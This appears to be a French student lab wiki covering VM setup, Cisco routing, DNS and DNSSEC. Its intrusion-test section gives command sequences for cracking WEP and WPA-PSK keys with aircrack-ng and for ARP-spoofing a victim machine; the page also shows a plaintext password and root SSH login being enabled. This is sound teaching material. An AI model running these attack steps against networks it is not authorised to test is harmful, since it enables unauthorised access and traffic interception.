&lt;br /&gt;
Informations générales&lt;br /&gt;
----------------------&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! Domaine !! Distribution !! VLAN privé !! IP (VLAN333) !! Netmask (VLAN333) !! Gateway (VLAN333) !! Gateway 6509-E (VLAN333) !! Gateway 9200 (VLAN333) !! IP (publique)&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 1&lt;br /&gt;
| trompettedelamort.site&lt;br /&gt;
| Debian 10 Buster&lt;br /&gt;
| 301&lt;br /&gt;
| 100.64.0.28&lt;br /&gt;
| 255.255.255.0&lt;br /&gt;
| 100.64.0.254&lt;br /&gt;
| 100.64.0.1&lt;br /&gt;
| 100.64.0.2&lt;br /&gt;
| 193.48.57.188&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=2  Installation des systèmes d’exploitation (12/10/2020)=&lt;br /&gt;
&lt;br /&gt;
 ssh capbreton.plil.info&lt;br /&gt;
 xen-create-image --hostname=trompettedelamort --ip=100.64.0.28 --gateway=100.64.0.2 --netmask=255.255.255.0 --dir=/usr/local/xen --password=pasglop --dist=buster&lt;br /&gt;
&lt;br /&gt;
* Création des disques de stockage sur le serveur de virtualisation (pour tout les binômes):&lt;br /&gt;
&lt;br /&gt;
Sur Capbreton:&lt;br /&gt;
&lt;br /&gt;
** On réquisitionne les deux disques de 2,7To que l'on met dans un groupe&lt;br /&gt;
&lt;br /&gt;
 pvcreate /dev/sde&lt;br /&gt;
 pvcreate /dev/sdf&lt;br /&gt;
 vgcreate storage /dev/sde /dev/sdf&lt;br /&gt;
&lt;br /&gt;
** On créer 2 partitions de 10Go pour chaque binôme:&lt;br /&gt;
&lt;br /&gt;
 lvcreate -L10G -n trompettedelamort1 storage&lt;br /&gt;
 lvcreate -L10G -n trompettedelamort2 storage&lt;br /&gt;
 ...meme chose pour chaque groupe...&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
** On formate nos partitions:&lt;br /&gt;
&lt;br /&gt;
 mkfs.ext4 /dev/storage/trompettedelamort1&lt;br /&gt;
 mkfs.ext4 /dev/storage/trompettedelamort2&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* Modification du fichier de config de la VM (/etc/xen/trompettedelamort.cfg)&lt;br /&gt;
 vif = ['bridge=IMA5sc, ip=100.64.0.84, ...']&lt;br /&gt;
et on indique quel disque utiliser:&lt;br /&gt;
 disk       = [&lt;br /&gt;
               'file:/usr/local/xen/domains/trompettedelamort/disk.img,xvda2,w',&lt;br /&gt;
               'file:/usr/local/xen/domains/trompettedelamort/swap.img,xvda1,w',&lt;br /&gt;
               'phy:/dev/storage/trompettedelamort1,xvda3,w',&lt;br /&gt;
               'phy:/dev/storage/trompettedelamort2,xvda4,w'&lt;br /&gt;
             ]&lt;br /&gt;
&lt;br /&gt;
* Lancer la VM&lt;br /&gt;
 xl create -c /etc/xen/trompettedelamort.cfg&lt;br /&gt;
&lt;br /&gt;
Ensuite, sur la MV:&lt;br /&gt;
&lt;br /&gt;
* Montage et peuplement des partitions:&lt;br /&gt;
 mount /dev/xvda3 /mnt/xvda3&lt;br /&gt;
 mount /dev/xvda4 /mnt/xvda4&lt;br /&gt;
 mv /var/* /mnt/xvda4&lt;br /&gt;
 # /home est vide donc rien a déplacer&lt;br /&gt;
&lt;br /&gt;
puis on démonte:&lt;br /&gt;
 umount /mnt/xvda3&lt;br /&gt;
 umount /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
* Modification du fichier /etc/fstab pour monter les répertoires '''var''' et '''home''' sur les partitions crées. On ajoute:&lt;br /&gt;
 /dev/xvda3 /home /ext4 default 0 2&lt;br /&gt;
 /dev/xvda4 /var /ext4 default 0 2&lt;br /&gt;
&lt;br /&gt;
et on applique les modification du fichier fstab:&lt;br /&gt;
 mount -a&lt;br /&gt;
&lt;br /&gt;
=3  Architecture réseau=&lt;br /&gt;
&lt;br /&gt;
==3.1  L’architecture générale (12/10/2020)==&lt;br /&gt;
&lt;br /&gt;
La mise en service de l'infrastructure physique (démarrer les routeurs,connexions physiques entre eux et avec le routeur de l'école) a été principalement réalisés par le groupe 14.&lt;br /&gt;
&lt;br /&gt;
==3.2  Les réseaux virtuels (12/10/2020)==&lt;br /&gt;
&lt;br /&gt;
On créer deux VLAN:&lt;br /&gt;
* VLAN131 pour se connecter au routeur de l'école&lt;br /&gt;
* VLAN333 pour accéder aux machines virtuelles sur Capbreton&lt;br /&gt;
&lt;br /&gt;
Cette partie a partiellement été réalisée par le groupe 14 lors de la première séances&lt;br /&gt;
&lt;br /&gt;
==3.5  Interconnexion avec Internet IPv4(15/10/2020 &amp;amp; 02/11/2020)==&lt;br /&gt;
&lt;br /&gt;
Le réseau utilisé pour ce TP est le 193.48.57.176/28 (cohabitation avec les IMA2A5 qui ont 193.48.57.160/27). Nous avons donc a notre disposition 16 adresses IP (193.48.57.176 à 193.48.57.191) parmi lesquelles nous devons réserver :&lt;br /&gt;
* 1 adresse pour le réseau&lt;br /&gt;
* 1 adresse de Broadcast&lt;br /&gt;
* 1 adresse pour le routeur 1 (6509-E)&lt;br /&gt;
* 1 adresse pour le routeur 2 (9200)&lt;br /&gt;
* 1 adresse flottante pour les routeurs (redondance)&lt;br /&gt;
Ce qui nous laisse 11 adresses disponibles pour 13 groupes...Impossible&lt;br /&gt;
&lt;br /&gt;
L'idée est donc de créer un sous réseau 10.64.0.16/28 et de faire de de la Translation d'adresse (NAT) vers 193.48.57.176/28&lt;br /&gt;
Nous économisons ainsi les adresses des routeurs et de diffusion qui n'ont pas besoin d’être translatées.&lt;br /&gt;
&lt;br /&gt;
===OSPF===&lt;br /&gt;
L'OSPF permet aux routeurs dans un même domaine d'échanger des informations sur le réseau. Cela permet aux différents routeurs voisins d'avoir de meilleur tables de routages. On réalise donc cette étape sur les deux routeurs pour qu'ils s'echanges leurs tables entre eux mais également avec le routeur de l'école&lt;br /&gt;
&lt;br /&gt;
'''6509-E'''&lt;br /&gt;
&lt;br /&gt;
 ip route 193.48.57.176 255.255.255.0 null0   #Ajout d'une route vers le routeur pour pouvoir ping directement à partir du routeur&lt;br /&gt;
&lt;br /&gt;
 router ospf 1                                          # un numéro de processus                                                                                                         &lt;br /&gt;
  router-id 10.60.0.101                                 # un id pour le routeur (plus petite adresse disponible)&lt;br /&gt;
  log-adjacency-changes                                                                                  &lt;br /&gt;
  summary-address 193.48.57.176 255.255.255.240         # adresse que l'on souhaite diffuser aux voisins (addresse du VLAN 333)                                                                                                            &lt;br /&gt;
  summary-address 100.60.0.0 255.240.0.0 not-advertise  # address q'on veut pas diffuser (celle du reseau privé)&lt;br /&gt;
  summary-address 10.0.0.0 255.0.0.0 not-advertise      # address q'on veut pas diffuser (?)                                                                                                             &lt;br /&gt;
  redistribute connected subnets                        # autorise la diffusion pour les nouveaux réseaux qui peuvent être connectés   &lt;br /&gt;
  redistribute static subnets                                                                                                                        &lt;br /&gt;
  network 192.168.222.8 0.0.0.7 area 2                  # domaine de diffusion OSPF (Attention au masque inversé)&lt;br /&gt;
&lt;br /&gt;
On peut vérifier le bon fonctonnement avec un ping vers l'adresse globale routeur de l'école&lt;br /&gt;
 ping 193.48.57.48&lt;br /&gt;
&lt;br /&gt;
De plus, on constate de nouvelles routes partagé par le routeur de l'école (&amp;quot;O&amp;quot; au début de la ligne)&lt;br /&gt;
 show ip route&lt;br /&gt;
&lt;br /&gt;
'''9200'''&lt;br /&gt;
On fait la meme chose en changeant le router-id : 10.60.0.102&lt;br /&gt;
&lt;br /&gt;
===NAT===&lt;br /&gt;
On cherche à réaliser une translation d'IP (NAT static) et non une mascarade (injection = NAT Dynamic)&lt;br /&gt;
 ip nat inside source static network 100.64.0.16 193.48.57.176 /28&lt;br /&gt;
Cela permet d'associer les adresse non routées de 100.64.0.16 à 100.64.0.28 aux adresse routées de 193.48.57.176 à 193.48.57.188&lt;br /&gt;
Il faut ensuite indiquer ques sont les VLAN concernés par la translation:&lt;br /&gt;
 int vlan 131&lt;br /&gt;
  ip nat outside&lt;br /&gt;
  exit&lt;br /&gt;
 int  vlan 333&lt;br /&gt;
  ip nat inside&lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
===Problème association OSPF et NAT===&lt;br /&gt;
Il semblerait que l'association de l'OSPF et du NAT soit plus complexe que prévu: les deux fonctionnent bien indépendamment mais pas ensemble. En effet, l'OSPF n'annonce pas les routes vers 100.64.0.16/28 donc aucune communication vers l'exterieur n'est possible.&lt;br /&gt;
&lt;br /&gt;
Pour palier à ce problème, on déclare 100.64.0.0/24 sur VLAN333 et annonce manuellement les routes entre 193.48.57.176 et 100.640.16 (plus de NAT).&lt;br /&gt;
La configuration du 9200 a été faite par M. Redon, on s'occupe du 6509-E :&lt;br /&gt;
 boot&lt;br /&gt;
 enable&lt;br /&gt;
 conf t&lt;br /&gt;
 int vlan 333&lt;br /&gt;
 no ip address 193.48.57.161 255.255.255.224 #on enleve l'ancienne ip routée&lt;br /&gt;
 ip address 100.64.0.1 255.255.255.0&lt;br /&gt;
 exit&lt;br /&gt;
 exit&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
on modifie également l'identifiant de l'ospf 1 qui était en conflit avec celui des IMA2A5:&lt;br /&gt;
 router ospf 1&lt;br /&gt;
 router-id 10.60.100.1&lt;br /&gt;
&lt;br /&gt;
Enfin, on ajoute la route vers notre MV à la main:&lt;br /&gt;
&lt;br /&gt;
 ip route 193.48.57.188 255.255.255.255 100.64.0.28&lt;br /&gt;
&lt;br /&gt;
Puis on configure notre machine virtuelle de manière a ce qu'elle ait les deux IP (100.64.0.28 et 193.48.57.188)(cf. partie suivante). &lt;br /&gt;
&lt;br /&gt;
Les paquets venant de l'extérieur sont propagé à destination de 193.48.57.188 au routeur (6509-E ou 9200) puis vers 100.64.0.28 sur le VLAN333 suivant la route indiquée précédemment. Les paquets émis par notre machine virtuelle sont transmis à la passerelle par défaut (100.64.0.1 si 6509-E ou 100.64.0.2 si 9200) (comme spécifié avec le mot clé &amp;quot;src&amp;quot; lors de l'établissement des routes) puis le routeur connait les routes pour sortir en passant par le routeur de l'école.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==3.6  Interconnexion avec Internet (IPv6)(02/11/2020)==&lt;br /&gt;
Le groupe 14 c'est occupé de configurer le vlan333 pour qu'il utilise des ipv6&lt;br /&gt;
&lt;br /&gt;
On crée le VLAN301 pour notre domaine:&lt;br /&gt;
&lt;br /&gt;
* '''sur 6509-E'''&lt;br /&gt;
 conf t&lt;br /&gt;
 vlan 301&lt;br /&gt;
 name trompettedelamort&lt;br /&gt;
 exit&lt;br /&gt;
 int vlan 301&lt;br /&gt;
 no shutdown&lt;br /&gt;
 ip address 10.60.101.1 255.255.255.0&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60b3::0/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60b3::0/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High #car routeur principale&lt;br /&gt;
&lt;br /&gt;
* '''sur 6509-E'''&lt;br /&gt;
 conf t&lt;br /&gt;
 vlan 301&lt;br /&gt;
 name trompettedelamort&lt;br /&gt;
 exit&lt;br /&gt;
 int vlan 301&lt;br /&gt;
 no shutdown&lt;br /&gt;
 ip address 10.60.101.2 255.255.255.0&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60b3::0/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60b3::0/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference Low&lt;br /&gt;
&lt;br /&gt;
Annonce de route avec RIP fait par groupe 14&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==3.7  Sécurisation du réseau (02/11/2020)==&lt;br /&gt;
En partenariat avec le groupe 14.&lt;br /&gt;
Attention la syntaxe est différente entre le 9200 et le 6509-E&lt;br /&gt;
On configure la redondance avec l'adresse flottante pour les VLAN333 et VLAN1 ainsi que pour le notre VLAN301.&lt;br /&gt;
'''6509-E'''&lt;br /&gt;
 conf t&lt;br /&gt;
 int vlan 333&lt;br /&gt;
 vrrp 33 ip 100.64.0.254 # adresse flottante des routeur dans vlan333&lt;br /&gt;
 vrrp 33 preemt # priorité au routeur qui a une priorité supérieur&lt;br /&gt;
 vrrp 33 priority 110 # priorité supérieur a celle du 9200&lt;br /&gt;
 exit&lt;br /&gt;
 int vlan 301&lt;br /&gt;
 vrrp 31 ip 10.60.100.254 # adresse flottante des routeur dans vlan333&lt;br /&gt;
 vrrp 31 preemt # priorité au routeur qui a une priorité supérieur&lt;br /&gt;
 vrrp 31 priority 110 # priorité supérieur a celle du 9200&lt;br /&gt;
 exit&lt;br /&gt;
 int vlan 301&lt;br /&gt;
 vrrp 41 ip 10.60.101.254 # adresse flottante des routeur dans notre vlan&lt;br /&gt;
 vrrp 41 preemt&lt;br /&gt;
 vrrp 41 priority 110&lt;br /&gt;
 exit&lt;br /&gt;
 exit&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
'''9200'''&lt;br /&gt;
 conf t&lt;br /&gt;
 int vlan 333&lt;br /&gt;
 vrrp 33 address-family ipv4&lt;br /&gt;
 priority 100&lt;br /&gt;
 address 100.64.0.254&lt;br /&gt;
 preemt &lt;br /&gt;
 exit&lt;br /&gt;
 int vlan 1&lt;br /&gt;
 vrrp 31 address-family ipv4&lt;br /&gt;
 priority 100&lt;br /&gt;
 address 10.60.100.254&lt;br /&gt;
 preemt &lt;br /&gt;
 exit&lt;br /&gt;
 int vlan 301&lt;br /&gt;
 vrrp 41 address-family ipv4&lt;br /&gt;
 priority 100&lt;br /&gt;
 address 10.60.101.254&lt;br /&gt;
 preemt&lt;br /&gt;
 exit&lt;br /&gt;
 exit&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
==3.8  Interconnexion Internet de secours (IPv4) (16/11/2020)==&lt;br /&gt;
(En collaboration avec le groupe 14)&lt;br /&gt;
&lt;br /&gt;
On connecte physiquement l'ISR au SDSL: Dans le local technique SR52, on repere sur quel port est branché le l'ÍSR pour le mettre dans le VLAN 531&lt;br /&gt;
 conf t&lt;br /&gt;
 int Gi0/37&lt;br /&gt;
 switchport mode access&lt;br /&gt;
 switchport access vlan 531&lt;br /&gt;
 exit&lt;br /&gt;
 exit&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
Sur l'ISR:&lt;br /&gt;
* On creer le vlan 531:&lt;br /&gt;
 conf t&lt;br /&gt;
 vlan 531&lt;br /&gt;
&lt;br /&gt;
==3.9  Interconnexion Internet de secours (IPv6) (pas encore fait)==&lt;br /&gt;
&lt;br /&gt;
=4  Services Internet=&lt;br /&gt;
&lt;br /&gt;
==Connexion a internet (02/11/2020)==&lt;br /&gt;
&lt;br /&gt;
Afin de mettre internet sur nos machines il faut au préalable modifier le fichier /etc/network/interfaces de nos VM:&lt;br /&gt;
 # The loopback network interface&lt;br /&gt;
   auto lo&lt;br /&gt;
   iface lo inet loopback&lt;br /&gt;
 # The primary network interface&lt;br /&gt;
   auto eth0&lt;br /&gt;
   iface eth0 inet static&lt;br /&gt;
   address 193.48.57.188&lt;br /&gt;
   netmask 255.255.255.255&lt;br /&gt;
   up ip address add dev eth0 100.64.0.28/24&lt;br /&gt;
   up ip route add default via 100.64.0.2 src 193.48.57.188&lt;br /&gt;
   down ip address del dev eth0 100.64.0.28/24&lt;br /&gt;
   down ip route del default via 100.64.0.2 src 193.48.57.188&lt;br /&gt;
&lt;br /&gt;
L'adresse 193.48.57.188 correspond à notre adressé routée, l'adresse 100.64.0.28 est notre adresse sur le vlan333 et l'adresse 100.64.0.2 est l'adresse du routeur/commutateur 9200 sur le vlan333.&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite ajouter la route sur le 9200 pour notre VM. Pour se faire on se connecte en ssh sur la zabeth09:&lt;br /&gt;
 ssh pifou@zabet09.plil.info&lt;br /&gt;
Et ensuite via minicom:&lt;br /&gt;
 minicom -os /dev/ttyACM0&lt;br /&gt;
On rentre la commande suivante (apres avoir fait enable et conf t au préalable):&lt;br /&gt;
 ip route 193.48.57.188 255.255.255.255 100.64.0.28 &lt;br /&gt;
&lt;br /&gt;
Nous avons désormais accès à internet sur nos VM et nous pouvons donc maintenant installer bind9 et configurer notre DNS.&lt;br /&gt;
&lt;br /&gt;
==4.1  Serveur SSH (02/11/2020)==&lt;br /&gt;
Le service SSH était activé par defaut.&lt;br /&gt;
Il faut juste autoriser la connexion en root dans le fichier /etc/ssh/sshd_config&lt;br /&gt;
 PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
puis systemctl restart sshd&lt;br /&gt;
&lt;br /&gt;
et on peut se connecter a notre vm&lt;br /&gt;
 ssh root@193.48.57.188&lt;br /&gt;
&lt;br /&gt;
==4.2  Serveur DNS (02/11/2020)==&lt;br /&gt;
&lt;br /&gt;
Pour commencer dans le fichier de configuration /etc/resolv.conf nous avons mis comme adresse de serveur de nom &lt;br /&gt;
 127.0.0.1&lt;br /&gt;
&lt;br /&gt;
Dans /etc/bind/named.conf.local, en suivant le cours nous avons modifié et/ou ajouté:&lt;br /&gt;
 options{&lt;br /&gt;
 directory &amp;quot;/var/cache/bind&amp;quot;;&lt;br /&gt;
  listen-on-v6 { any; };&lt;br /&gt;
  allow-transfer { &amp;quot;allowed_to_transfer&amp;quot;; };&lt;br /&gt;
 };&lt;br /&gt;
 acl &amp;quot;allowed_to_transfer&amp;quot; {&lt;br /&gt;
  217.70.177.40/32 ;&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Ensuite avec bind9 nous avons pu configurer notre serveur de nom.&lt;br /&gt;
Dans le fichier /etc/bind/named.conf.local nous avons défini notre zone &amp;quot;trompettedelamort.site&amp;quot;:&lt;br /&gt;
 zone &amp;quot;trompettedelamort.site&amp;quot; IN {&lt;br /&gt;
             type master;&lt;br /&gt;
             file &amp;quot;/etc/bind/db.trompettedelamort.site&amp;quot;;&lt;br /&gt;
             allow-transfer { 217.70.177.40;};&lt;br /&gt;
        };&lt;br /&gt;
&lt;br /&gt;
Puis nous avons configuré le fichier db.trompettedelamort.site. Pour se faire nous avons pris le fichier par defaut db.local que nous avons copié puis modifié:&lt;br /&gt;
 zone &amp;quot;trompettedelamort.site&amp;quot; IN {&lt;br /&gt;
 ;&lt;br /&gt;
 ; BIND data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL    604800&lt;br /&gt;
 @       IN      SOA      ns1.trompettedelamort.site.  postmaster.trompettedelamoo&lt;br /&gt;
 rt.site(&lt;br /&gt;
                              4         ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns1.trompettedelamort.site.&lt;br /&gt;
 @       IN      NS      ns6.gandi.net.&lt;br /&gt;
 ns1     IN      A       193.48.57.188&lt;br /&gt;
&lt;br /&gt;
Enfin sur gandi.net nous avons crée un glue record dans lequel nous avons mis l'adresse ip de notre machine virtuelle puis nous avons ajouté dans Nameservers. &lt;br /&gt;
ns6.gandi.net possedant déjà son glue record, nous avons simplement ajouté ce dernier dans Nameservers.&lt;br /&gt;
&lt;br /&gt;
==4.3  Sécurisation de site web par certificat (16/11/2020)==&lt;br /&gt;
&lt;br /&gt;
La documentation de ce point est disponible sur demande en contactant un membre du binôme.&lt;br /&gt;
&lt;br /&gt;
===Verifications===&lt;br /&gt;
https://www.trompettedelamort.site&lt;br /&gt;
&lt;br /&gt;
==4.4  Sécurisation de serveur DNS par DNSSEC (16/11/2020)==&lt;br /&gt;
&lt;br /&gt;
La configuration a été réalisé en suivant les instructions dans le sujet de TP rubrique : 4.4  Sécurisation de serveur DNS par DNSSEC&lt;br /&gt;
&lt;br /&gt;
Premièrement nous avons modifié le ficher named.conf.options pour y ajouter l'options suivantes:&lt;br /&gt;
 dnssec-enable yes&lt;br /&gt;
&lt;br /&gt;
Nous avons ensuite crée un repertoir trompettedelamort.dnssec afin d'y générer les clefs. Nous devons générer une paire de clef KSK et une paire de clef ZSK.&lt;br /&gt;
&lt;br /&gt;
Pour créer la paire de clef KSK, nous utilisons la commande suivante:&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 2048 -f KSK -n ZONE trompettedelamort.site&lt;br /&gt;
&lt;br /&gt;
Et pour la paire de clef ZSK, nous utilisons la commande suivante:&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 1024 -n ZONE trompettedelamort.site&lt;br /&gt;
&lt;br /&gt;
Nous renommons ces paires avec comme prefixe trompettedelamort.site et comme suffice -zsk pour la paire zsk et -ksk pour la paire ksk et nous terminon avec .key pour les clefs publiques et .private pour les clefs privées.&lt;br /&gt;
&lt;br /&gt;
Ensuite dans notre fichier zone db.trompettedelamort.site nous ajoutons les lignes suivantes sans oublier d'incrémenter le  Serial:&lt;br /&gt;
 $include /etc/bind/trompettedelamort.dnssec/trompettedelamort-ksk.key&lt;br /&gt;
 $include /etc/bind/trompettedelamort.dnssec/trompettedelamort-zsk.key&lt;br /&gt;
&lt;br /&gt;
Le fichier db.trompettedelamort.site ressemble donc à cela:&lt;br /&gt;
 ;&lt;br /&gt;
 ; BIND data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL	604800&lt;br /&gt;
 @ 	IN	SOA	 ns1.trompettedelamort.site.  postmaster.trompettedelamort.site.(&lt;br /&gt;
			      8		; Serial&lt;br /&gt;
			 604800		; Refresh&lt;br /&gt;
			  86400		; Retry&lt;br /&gt;
			2419200		; Expire&lt;br /&gt;
			 604800 )	; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @	IN	NS	ns1.trompettedelamort.site.&lt;br /&gt;
 @	IN	NS	ns6.gandi.net.&lt;br /&gt;
 @	IN	MX	100 ns1.trompettedelamort.site.&lt;br /&gt;
 ns1	IN	A       193.48.57.188&lt;br /&gt;
 www	IN	A	193.48.57.188	&lt;br /&gt;
 $include /etc/bind/trompettedelamort.site.dnssec/trompettedelamort.site-ksk.key&lt;br /&gt;
 $include /etc/bind/trompettedelamort.site.dnssec/trompettedelamort.site-zsk.key&lt;br /&gt;
&lt;br /&gt;
Nous signons ensuite les enregristrement de la zone avec la commande suivante:&lt;br /&gt;
 dnssec-signzone -o trompettedelamort.site -k trompettedelamort.site-ksk ../db.trompettedelamort.site trompettedelamort.site-zsk&lt;br /&gt;
Ce qui a pour effet de générer un fichier zone &amp;quot;db.trompettedelamort.site.signed&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Nous n'avons donc plus qu'a remplacer db.trompettedelamort.site par db.trompettedelamort.site.signed dans le fichier named.conf.local:&lt;br /&gt;
 root@trompettedelamort:~# cat /etc/bind/named.conf.local   &lt;br /&gt;
 //&lt;br /&gt;
 // Do any local configuration here&lt;br /&gt;
 zone &amp;quot;trompettedelamort.site&amp;quot; IN {&lt;br /&gt;
             type master;&lt;br /&gt;
             file &amp;quot;/etc/bind/db.trompettedelamort.site.signed&amp;quot;;&lt;br /&gt;
             allow-transfer { 217.70.177.40;};&lt;br /&gt;
        };&lt;br /&gt;
 // Consider adding the 1918 zones here, if they are not used in your&lt;br /&gt;
 // organization&lt;br /&gt;
 //include &amp;quot;/etc/bind/zones.rfc1918&amp;quot;;&lt;br /&gt;
&lt;br /&gt;
Pour finir il ne reste plus qu'a fournir la clef publique de la clef KSK à gandi.net. Pour se faire il faut se rendre dans &amp;quot;DNSSEC&amp;quot; puis dans &amp;quot;Add an external key&amp;quot;, choisir KSK et &amp;quot;RSA/SHA-1&amp;quot; et renseigner la clef se trouvant dans&lt;br /&gt;
 /etc/bind/trompettedelamort.site.dnssec/trompettedelamort.site-ksk.key &lt;br /&gt;
&lt;br /&gt;
On vérifie avec la commande suivante:&lt;br /&gt;
 dnssec-verify -o trompettedelamort.site db.trompettedelamort.site.signed&lt;br /&gt;
 &lt;br /&gt;
Qui nous renvoie ce résultat:&lt;br /&gt;
 Verifying the zone using the following algorithms: RSASHA1.&lt;br /&gt;
 Zone fully signed:&lt;br /&gt;
 Algorithm: RSASHA1: KSKs: 1 active, 0 stand-by, 0 revoked&lt;br /&gt;
                    ZSKs: 1 active, 0 stand-by, 0 revoked&lt;br /&gt;
 ../db.trompettedelamort.site.signed&lt;br /&gt;
&lt;br /&gt;
=Tests d’intrusion=&lt;br /&gt;
&lt;br /&gt;
==5.1  Exploitation de failles du système (en cours)==&lt;br /&gt;
&lt;br /&gt;
==5.2  Cassage de clef WEP d’un point d’accès WiFi (15/10/2020)==&lt;br /&gt;
&lt;br /&gt;
Avec le packetage aircrack-ng il est possible de casser une clef wep.&lt;br /&gt;
&lt;br /&gt;
Pour se faire on récupère le nom de de notre interface WiFi et son adresse MAC avec :&lt;br /&gt;
 iwconfig&lt;br /&gt;
&lt;br /&gt;
Ensuite pour analyser les packets WiFi qui circulent sur le réseau on se sert de la commande:&lt;br /&gt;
 airodump-ng nomDeMaCarte&lt;br /&gt;
Se faisant, l'interface se met automatiquement en mode monitor.&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite tester le Point d'accés avec une injection test:&lt;br /&gt;
 aireplay-ng -9 -e nomPA -a MACPA nomDeMaCarte&lt;br /&gt;
-9 permet de réaliser un test.&lt;br /&gt;
&lt;br /&gt;
Pour casser la clef WEP, l'algorithme nécessite le plus de vecteur d'initialisation possible. Pour récupérer ces derniers on se sert de la commande suivante:&lt;br /&gt;
 airodump-ng -c 3 --bssid MACPA -w output nomDeMaCarte&lt;br /&gt;
-c 3 correspond au canal sur lequel émet notre PA, et output sera le fichier contenant tous les vecteurs d'initialisations.&lt;br /&gt;
&lt;br /&gt;
Pour accélérer l'acquisition de vecteurs d'initialisations,nous allons récupérer tous les paquets ARP émis par le PA et les réinjecter. A chaque réinjection les PA génère un nouveau vecteur d'initialisation, cette technique permet d'accélérer la collecte des vecteurs.&lt;br /&gt;
&lt;br /&gt;
Pour permettre l'injection de paquet ARP dans le PA il faut d'abord associer la carte et le PA:&lt;br /&gt;
 aireplay-ng 1 0 -e nomPA -a MACPA -h MACcarte nomDeMaCarte&lt;br /&gt;
-1 correspond à une fausse authentification et 0 au délais de réassociation.&lt;br /&gt;
&lt;br /&gt;
Une fois que nous avons collecté suffisament de vecteurs nous pouvons lancer l'algorithme de cassage:&lt;br /&gt;
 aircrack-ng -b MACPA output*.cap&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==5.3  Cassage de mot de passe WPA-PSK par force brute (02/11/2020)==&lt;br /&gt;
&lt;br /&gt;
On commence par mettre l'interface WiFi en mode monitor:&lt;br /&gt;
 airmon-ng start maCarte&lt;br /&gt;
&lt;br /&gt;
Ensuite on lance une écoute généralisée des trames WiFi qui circulent:&lt;br /&gt;
 airodump-ng maCarte&lt;br /&gt;
&lt;br /&gt;
A partir de là on peut récupérer le BSSID, L'ESSID et le canal utilisé par le PA qui nous intéresse, nous avons pris la kracotte03.&lt;br /&gt;
&lt;br /&gt;
Puis pour cibler la recherche on lance la commande suivante:&lt;br /&gt;
 airodump-ng -c 3 --bssid MACPA -w psk maCarte&lt;br /&gt;
&lt;br /&gt;
A partir de la on attend un handshake (émis lors de la connexion d'un utilisateur au PA).&lt;br /&gt;
&lt;br /&gt;
Une fois le handshake récupéré il n'y a plus qu'a lancer l'algorithme pour casser la PSK:&lt;br /&gt;
 aircrack-ng -w dictionnaire -b MACPA psk*.cap&lt;br /&gt;
&lt;br /&gt;
Il faut au préalable avoir un dictionnaire contenant toutes les combinaisons qui nous intéressent, dans notre un cas il nous faut toutes les combinaisons possibles sur 8bits en décimale.&lt;br /&gt;
Pour se faire soit on fait un petit programme générant toutes les combinaisons possibles, soit on se sert d'un outil de création de dictionnaire. Nous avons utilisé crunch avec la commande suivante:&lt;br /&gt;
 crunch 8 8 0123456789 -o dictionnaire&lt;br /&gt;
&lt;br /&gt;
Nous avons du attendre quelques heures avant que aircrack nous retourne la clef.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==5.4  Attaque de type &amp;quot;homme au milieu&amp;quot; par usurpation ARP (06/11/2020)==&lt;br /&gt;
&lt;br /&gt;
N'ayant pas accès au eeePC (COVID19) on a créé deux machines virtuelles sur note machine personnelle pour simuler l'environement de TP.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Fichier:ARP1.png|1000px]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On transforme la machine '''attacker''' en routeur:&lt;br /&gt;
 attacker@attacker:~/ sysctl -w net.ipv4.ip_forward=1&lt;br /&gt;
&lt;br /&gt;
Puis on lance l'empoisonnement du cache ARP de la victime:&lt;br /&gt;
 attacker@attacker:~/ arpspoof -i enp0s3 -t 192.168.1.74 192.168.1.254&lt;br /&gt;
&lt;br /&gt;
On peut vérifier que l'attaque a bien fonctionné en observant la table ARP de la victime:&lt;br /&gt;
 victime@victime:~/ /arp&lt;br /&gt;
 bbox.lan (192.168.1.254) at 08:00:27:34:f9:27&lt;br /&gt;
 ...&lt;br /&gt;
 attacker (192.168.1.44) at 08:00:27:34:f9:27&lt;br /&gt;
L'adresse MAC de la passerelle par défaut (ma box internet dans ce cas) est la même que celle de la machine '''attacker'''&lt;br /&gt;
&lt;br /&gt;
Lorsque la machine veut communiquer avec l'extérieur, elle passe donc automatiquement par la machine '''attacker''':&lt;br /&gt;
 victime@victime:~/ traceroute 8.8.8.8&lt;br /&gt;
